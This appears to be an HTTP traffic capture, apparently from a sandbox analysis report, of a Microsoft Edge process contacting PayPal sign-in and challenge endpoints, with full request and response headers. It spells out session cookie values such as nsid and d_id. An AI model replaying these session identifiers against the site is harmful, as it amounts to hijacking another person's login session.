set-cookie: nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:19:51 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793684991%26vteXpYrS%3D1698988791%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:49:51 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:49:51 GMT; Secure
traceparent: 00-0000000000000000000f29277434445e-32dbcc48afebd992-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:49:51 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-etou8220109-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698986991.458880,VS0,VE259
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f29277434445e-82e1fb3f6046866d-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/signin/client-log

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /signin/client-log HTTP/2.0
host: www.paypal.com
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json
accept-encoding: gzip, deflate, br
content-length: 595
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=unifiedloginnodeweb; x-pp-s=eyJ0IjoiMTY5ODk4Njk5MTYyOCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793684991%26vteXpYrS%3D1698988791%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-fTWz9zeA0TE12nD0rzCaRlJ0PmeW7I8wgQ+3BlxYmRgU3PB3' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"82a-cr1VL9RIEnKYsDI93Neb8vfG7/8"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f924286c1ca6a
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:06 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:10 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAxMDI2MCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:10 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685010%26vteXpYrS%3D1698988810%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:10 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:10 GMT; Secure
traceparent: 00-0000000000000000000f924286c1ca6a-7b3cc7d53ab54030-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:10 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-etou8220033-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987010.134539,VS0,VE212
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f924286c1ca6a-5eb53cdb6dab23b7-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
x-requested-with: XMLHttpRequest
accept-encoding: gzip, deflate, br
content-length: 246
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=unifiedloginnodeweb; x-pp-s=eyJ0IjoiMTY5ODk4Njk5MTYyOCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793684991%26vteXpYrS%3D1698988791%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-5cPONHYp3B3q9EskINNqnosrkFluA2q9/AYke1dyoe8tDw0K' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"771-sV9GdJ4dTXV34I0ASu/u2xL6wS8"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f632098d00458
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:11 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:07 GMT; HttpOnly; Secure
set-cookie: tsrce=authchallengenodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Mon, 06 Nov 2023 04:50:10 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAxMTg5OSIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:11 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685011%26vteXpYrS%3D1698988811%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:11 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:11 GMT; Secure
traceparent: 00-0000000000000000000f632098d00458-1c4bf3d76bb0d36c-01
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:11 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-etou8220105-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987012.775541,VS0,VE209
vary: Accept-Encoding
server-timing: content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/signin/client-log

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /signin/client-log HTTP/2.0
host: www.paypal.com
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json
accept-encoding: gzip, deflate, br
content-length: 1221
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAxMTg5OSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685011%26vteXpYrS%3D1698988811%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-/PgTCTMkQwtezKjS60gNjdasZOipPVuzeQ49k6RqGMFd4swY' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"8df-Qp9d69f/7oCL3HBeD0l8b9Drmxo"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f545702d37088
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:22 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:18 GMT; HttpOnly; Secure
set-cookie: tsrce=unifiedloginnodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Mon, 06 Nov 2023 04:50:21 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAyMjI0NSIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:22 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685022%26vteXpYrS%3D1698988822%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:22 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:22 GMT; Secure
traceparent: 00-0000000000000000000f545702d37088-0c76d1f9723ab7ed-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:22 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230079-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987022.108328,VS0,VE225
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f545702d37088-3674754f8a6ce9f3-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/signin/client-log

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /signin/client-log HTTP/2.0
host: www.paypal.com
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json
accept-encoding: gzip, deflate, br
content-length: 714
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAxMTg5OSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685011%26vteXpYrS%3D1698988811%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-Ma8O/1zeLOm22+KOQqQwngxUsYOnG7HNB5DjhAMpLRoV5Z0m' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"82b-Yrqlqrfq4bv3QAeigcOlRvw65Gg"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f545702d6504a
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:22 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:18 GMT; HttpOnly; Secure
set-cookie: tsrce=unifiedloginnodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Mon, 06 Nov 2023 04:50:21 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAyMjI0OSIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:22 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685022%26vteXpYrS%3D1698988822%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:22 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:22 GMT; Secure
traceparent: 00-0000000000000000000f545702d6504a-ec3e794d1fe55b16-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:22 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230061-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987022.115881,VS0,VE224
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f545702d6504a-e65892698722cd70-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
GET

https://www.paypal.com/auth/createchallenge/131f89fa914d5d62/challenge.js

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

GET /auth/createchallenge/131f89fa914d5d62/challenge.js HTTP/2.0
host: www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
accept: application/json
accept-encoding: gzip, deflate, br
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=unifiedloginnodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAyMjI0OSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685011%26vteXpYrS%3D1698988811%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-FPFYLb9L7jQtvGULoiF3DDnCRoWVRY3Xa2vUYqSlSTn2sRXL' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"858-QM75m9sY35A9i9azr7H3pljTzeE"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f9115647227c7
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
